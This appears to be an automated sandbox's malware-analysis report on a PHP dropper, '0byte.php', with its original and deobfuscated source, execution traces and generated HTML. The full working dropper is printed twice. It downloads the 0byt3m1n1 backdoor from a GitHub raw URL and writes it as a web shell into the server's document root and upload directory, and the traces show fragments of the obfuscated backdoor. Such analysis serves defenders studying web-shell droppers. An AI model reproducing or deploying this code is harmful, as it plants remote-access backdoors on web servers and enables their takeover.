PHP Malware Analysis
0byte.php
md5: fa57ac30a60753991bf682d7367c9842
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- getcwd (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Original)
URLs
- http://localhost/0.php (HTML, Traces)
- http://localhost/uploads/0.php (Traces)
- https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
/*
403 FORBIDDEN BYPASS
WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0.php";
function _doEvil($name, $file)
{
$filename = $name;
$getFile = file_get_contents($file);
$rootPath = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
$toRootFopen = fopen("{$rootPath}/{$filename}", 'w');
$toRootExec = fwrite($toRootFopen, $getFile);
$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . "/{$filename}";
$realPath = getcwd() . DIRECTORY_SEPARATOR;
$toRealFopen = fopen("{$realPath}/{$filename}", 'w');
$toRealExec = fwrite($toRealFopen, $getFile);
$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . dirname($_SERVER[REQUEST_URI]) . "/{$filename}";
echo "<center>";
if ($toRootExec) {
if (file_exists($rootPath . "{$filename}")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$rootShellUrl}\" target=\"_blank\">{$rootShellUrl}</a></font></h1>";
} else {
echo "<h1><font color=\"red\">{$rootPath}{$filename}<br>Doesn't exist!</font>Try with another method!</h1>";
}
} else {
if ($toRealExec) {
if (file_exists($realPath . "{$filename}")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$realShellUrl}\" target=\"_blank\">{$realShellUrl}</a></font></h1>";
} else {
echo "<h1><font color=\"red\">FAILED!</font></h1>";
}
}
}
echo "</center>";
}
_doEvil($name, $source);
?> Execution traces
data/traces/fa57ac30a60753991bf682d7367c9842_trace-1676259232.0258.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:34:17.923648]
1 0 1 0.000141 393512
1 3 0 0.000308 406288 {main} 1 /var/www/html/uploads/0byte.php 0 0
1 A /var/www/html/uploads/0byte.php 6 $source = 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
1 A /var/www/html/uploads/0byte.php 7 $name = '0.php'
2 4 0 0.000358 406288 _doEvil 1 /var/www/html/uploads/0byte.php 41 2 '0.php' 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
2 A /var/www/html/uploads/0byte.php 10 $filename = '0.php'
3 5 0 0.000386 406288 file_get_contents 0 /var/www/html/uploads/0byte.php 11 1 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
3 5 1 0.037061 422304
3 5 R '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
2 A /var/www/html/uploads/0byte.php 11 $getFile = '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
2 A /var/www/html/uploads/0byte.php 12 $rootPath = '/var/www/html/'
3 6 0 0.037192 422352 fopen 0 /var/www/html/uploads/0byte.php 13 2 '/var/www/html//0.php' 'w'
3 6 1 0.037244 422888
3 6 R resource(5) of type (stream)
2 A /var/www/html/uploads/0byte.php 13 $toRootFopen = resource(5) of type (stream)
3 7 0 0.037274 422768 fwrite 0 /var/www/html/uploads/0byte.php 14 2 resource(5) of type (stream) '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
3 7 1 0.037334 422832
3 7 R 9202
2 A /var/www/html/uploads/0byte.php 14 $toRootExec = 9202
2 A /var/www/html/uploads/0byte.php 15 $rootShellUrl = 'http://localhost/0.php'
3 8 0 0.037397 422816 getcwd 0 /var/www/html/uploads/0byte.php 16 0
3 8 1 0.037411 422864
3 8 R '/var/www/html/uploads'
2 A /var/www/html/uploads/0byte.php 16 $realPath = '/var/www/html/uploads/'
3 9 0 0.037437 422920 fopen 0 /var/www/html/uploads/0byte.php 17 2 '/var/www/html/uploads//0.php' 'w'
3 9 1 0.037469 423464
3 9 R resource(6) of type (stream)
2 A /var/www/html/uploads/0byte.php 17 $toRealFopen = resource(6) of type (stream)
3 10 0 0.037497 423336 fwrite 0 /var/www/html/uploads/0byte.php 18 2 resource(6) of type (stream) '<?php\n\n/*\n 0 b y t 3 m 1 n 1 - 2.2\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir = "\\x72\\x6d\\x6'
3 10 1 0.037548 423400
3 10 R 9202
2 A /var/www/html/uploads/0byte.php 18 $toRealExec = 9202
3 11 0 0.037587 423384 dirname 0 /var/www/html/uploads/0byte.php 19 1 '/uploads/0byte.php'
3 11 1 0.037602 423464
3 11 R '/uploads'
2 A /var/www/html/uploads/0byte.php 19 $realShellUrl = 'http://localhost/uploads/0.php'
3 12 0 0.037630 423440 file_exists 0 /var/www/html/uploads/0byte.php 22 1 '/var/www/html/0.php'
3 12 1 0.037649 423480
3 12 R TRUE
2 4 1 0.037669 407096
1 3 1 0.037677 407096
0.037713 326928
TRACE END [2023-02-13 01:34:17.961249]
Generated HTML code
<html><head></head><body><center><h1><font color="#00FF00">[OK!] <a href="http://localhost/0.php" target="_blank">http://localhost/0.php</a></font></h1></center> </body></html>Original PHP code
<?php
/*
403 FORBIDDEN BYPASS
WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0.php";
function _doEvil($name, $file) {
$filename = $name;
$getFile = file_get_contents($file);
$rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
$toRootFopen = fopen("$rootPath/$filename",'w');
$toRootExec = fwrite($toRootFopen, $getFile);
$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
$realPath = getcwd().DIRECTORY_SEPARATOR;
$toRealFopen = fopen("$realPath/$filename",'w');
$toRealExec = fwrite($toRealFopen, $getFile);
$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
echo "<center>";
if($toRootExec) {
if(file_exists($rootPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
}
}
else {
if($toRealExec) {
if(file_exists($realPath."$filename")) {
echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
}
else {
echo "<h1><font color=\"red\">FAILED!</font></h1>";
}
}
}
echo "</center>";
}
_doEvil($name, $source);
?>